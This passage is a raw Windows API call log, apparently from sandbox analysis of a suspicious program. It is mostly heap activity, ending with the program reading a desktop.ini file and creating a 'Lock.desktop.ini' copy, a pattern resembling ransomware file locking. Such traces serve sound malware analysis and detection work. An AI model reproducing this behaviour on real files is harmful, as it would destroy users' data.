PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0224.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0224.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0224.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0224.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0224.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0224.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0224.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0224.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8f0 [0224.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7e8 [0224.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0224.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0224.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0224.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0224.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7e8 | out: hHeap=0x2af0000) returned 1 [0224.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0224.209] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0224.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba28 [0224.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865b08 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0224.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a697f0 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0224.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0224.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0224.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0224.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0224.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0224.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0224.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0224.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0224.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0224.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0224.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0224.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0224.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0224.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0224.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0224.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0224.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0224.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0224.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0224.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0224.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0224.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0224.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0224.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0224.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0224.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0224.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0224.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0224.213] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0224.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0224.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x3854008 [0224.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0224.213] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0224.214] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures/desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0224.214] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0224.214] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0224.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0224.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0224.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0224.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0224.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0224.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0224.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0224.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0224.215] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0224.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0224.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0224.215] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0224.215] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0224.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0224.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0224.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0224.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.215] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0224.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0224.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0224.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0224.215] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0224.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0224.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0224.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0224.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0224.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0224.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0224.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0224.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0224.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0224.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0224.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0224.216] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures/" (normalized: "c:\\users\\public\\pictures")) returned 0x11 [0224.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3f58 | out: hHeap=0x2af0000) returned 1 [0224.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0224.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0224.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0224.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0224.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0224.217] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures/Lock.desktop.ini" (normalized: "c:\\users\\public\\pictures\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e0 [0224.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71a0 [0224.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0224.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0224.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0224.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0224.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0224.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0224.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0224.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0224.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0224.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0224.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0224.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0224.218] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0224.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0224.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0224.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0224.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0224.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0224.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0224.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0224.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0224.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0224.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0224.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0224.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0224.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0224.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0224.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0224.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0224.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0224.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0224.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0224.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0224.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0224.219] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0224.220] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0224.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0224.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0224.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0224.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x54e7020 [0224.223] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0224.223] ReadFile (in: hFile=0x520, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf4f8*=0x17c, lpOverlapped=0x0) returned 1 [0224.224] ReadFile (in: hFile=0x520, lpBuffer=0x3854008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3854008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0224.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0224.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0224.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0224.225] 